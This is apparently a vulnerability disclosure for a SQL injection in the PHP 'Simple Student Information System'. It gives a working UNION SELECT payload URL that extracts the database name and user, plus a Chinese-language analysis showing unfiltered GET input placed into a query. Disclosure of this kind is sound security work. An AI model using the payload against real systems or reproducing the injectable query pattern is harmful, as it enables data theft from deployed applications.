Vendor Homepage:

https://www.sourcecodester.com

Source Code Download:

Simple Student Information System

Payload

Simple Student Information System SQL Injection

http://192.168.1.8/sis/admin/departments/manage_department.php?id=-5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20-
image-20220807005100829

源码分析

admin/departments/manage_department.php 文件第1-13行,

根据代码可知,使用GET方法,获取了 id 参数,

并且未进行过滤直接拼接到SQL语句,造成SQL 注入漏洞

<?php
require_once('../../config.php');
if(isset($_GET['id'])){
    $qry = $conn->query("SELECT * FROM `department_list` where id = '{$_GET['id']}'");
    if($qry->num_rows > 0){
        $res = $qry->fetch_array();
        foreach($res as $k => $v){
            if(!is_numeric($k))
            $$k = $v;
        }
    }
}
?>